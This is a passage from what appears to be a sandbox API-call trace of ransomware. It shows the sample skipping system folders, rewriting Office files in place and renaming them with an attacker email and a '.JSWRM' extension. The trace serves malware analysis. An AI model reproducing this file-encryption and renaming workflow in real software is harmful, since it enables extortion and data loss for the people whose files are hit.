hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x6450, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x6450, lpOverlapped=0x0) returned 1 [0120.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.062] CloseHandle (hObject=0x314) returned 1 [0120.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0120.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0120.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0120.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0120.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0120.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.063] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR14F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir14f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR14F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir14f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0120.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0120.064] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x452b, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR15F.GIF", cAlternateFileName="")) returned 1 [0120.064] lstrcmpiW (lpString1="ZPDIR15F.GIF", lpString2=".") returned 1 [0120.064] lstrcmpiW (lpString1="ZPDIR15F.GIF", lpString2="..") returned 1 [0120.064] lstrcmpiW (lpString1="ZPDIR15F.GIF", lpString2="...") returned 1 [0120.064] lstrcmpiW (lpString1="ZPDIR15F.GIF", lpString2="windows") returned 1 [0120.064] lstrcmpiW (lpString1="ZPDIR15F.GIF", lpString2="recovery") returned 1 [0120.064] lstrcmpiW (lpString1="ZPDIR15F.GIF", lpString2="perflogs") returned 1 [0120.064] lstrcmpiW (lpString1="ZPDIR15F.GIF", lpString2="documents and settings") returned 1 [0120.064] lstrcmpiW (lpString1="ZPDIR15F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.064] lstrcmpiW (lpString1="ZPDIR15F.GIF", lpString2="system volume information") returned 1 [0120.064] lstrcmpiW (lpString1="ZPDIR15F.GIF", lpString2="msocache") returned 1 [0120.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR15F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR15F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR15F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0120.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR15F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR15F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR15F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0120.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR15F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir15f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.065] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=17707) returned 1 [0120.065] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4520) returned 0x24e1d8 [0120.066] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x4520, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x4520, lpOverlapped=0x0) returned 1 [0120.069] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.069] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x4520, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x4520, lpOverlapped=0x0) returned 1 [0120.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.070] CloseHandle (hObject=0x314) returned 1 [0120.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0120.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0120.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0120.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.070] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR15F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir15f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR15F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir15f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0120.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.071] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2fc1, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR16F.GIF", cAlternateFileName="")) returned 1 [0120.071] lstrcmpiW (lpString1="ZPDIR16F.GIF", lpString2=".") returned 1 [0120.071] lstrcmpiW (lpString1="ZPDIR16F.GIF", lpString2="..") returned 1 [0120.071] lstrcmpiW (lpString1="ZPDIR16F.GIF", lpString2="...") returned 1 [0120.071] lstrcmpiW (lpString1="ZPDIR16F.GIF", lpString2="windows") returned 1 [0120.071] lstrcmpiW (lpString1="ZPDIR16F.GIF", lpString2="recovery") returned 1 [0120.071] lstrcmpiW (lpString1="ZPDIR16F.GIF", lpString2="perflogs") returned 1 [0120.071] lstrcmpiW (lpString1="ZPDIR16F.GIF", lpString2="documents and settings") returned 1 [0120.071] lstrcmpiW (lpString1="ZPDIR16F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.071] lstrcmpiW (lpString1="ZPDIR16F.GIF", lpString2="system volume information") returned 1 [0120.071] lstrcmpiW (lpString1="ZPDIR16F.GIF", lpString2="msocache") returned 1 [0120.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0120.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR16F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR16F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR16F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0120.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR16F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR16F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR16F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0120.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0120.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR16F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir16f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.072] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12225) returned 1 [0120.072] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2fc0) returned 0x24e1d8 [0120.072] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2fc0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2fc0, lpOverlapped=0x0) returned 1 [0120.075] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.075] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2fc0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2fc0, lpOverlapped=0x0) returned 1 [0120.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.075] CloseHandle (hObject=0x314) returned 1 [0120.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0120.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0120.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0120.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0120.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0120.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.075] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR16F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir16f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR16F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir16f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0120.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0120.076] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x34cf, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR17F.GIF", cAlternateFileName="")) returned 1 [0120.076] lstrcmpiW (lpString1="ZPDIR17F.GIF", lpString2=".") returned 1 [0120.076] lstrcmpiW (lpString1="ZPDIR17F.GIF", lpString2="..") returned 1 [0120.076] lstrcmpiW (lpString1="ZPDIR17F.GIF", lpString2="...") returned 1 [0120.076] lstrcmpiW (lpString1="ZPDIR17F.GIF", lpString2="windows") returned 1 [0120.077] lstrcmpiW (lpString1="ZPDIR17F.GIF", lpString2="recovery") returned 1 [0120.077] lstrcmpiW (lpString1="ZPDIR17F.GIF", lpString2="perflogs") returned 1 [0120.077] lstrcmpiW (lpString1="ZPDIR17F.GIF", lpString2="documents and settings") returned 1 [0120.077] lstrcmpiW (lpString1="ZPDIR17F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.077] lstrcmpiW (lpString1="ZPDIR17F.GIF", lpString2="system volume information") returned 1 [0120.077] lstrcmpiW (lpString1="ZPDIR17F.GIF", lpString2="msocache") returned 1 [0120.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0120.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR17F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR17F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR17F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0120.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR17F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR17F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR17F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR17F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir17f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.090] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=13519) returned 1 [0120.090] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x34c0) returned 0x24e1d8 [0120.090] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x34c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x34c0, lpOverlapped=0x0) returned 1 [0120.093] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.093] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x34c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x34c0, lpOverlapped=0x0) returned 1 [0120.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.093] CloseHandle (hObject=0x314) returned 1 [0120.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0120.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 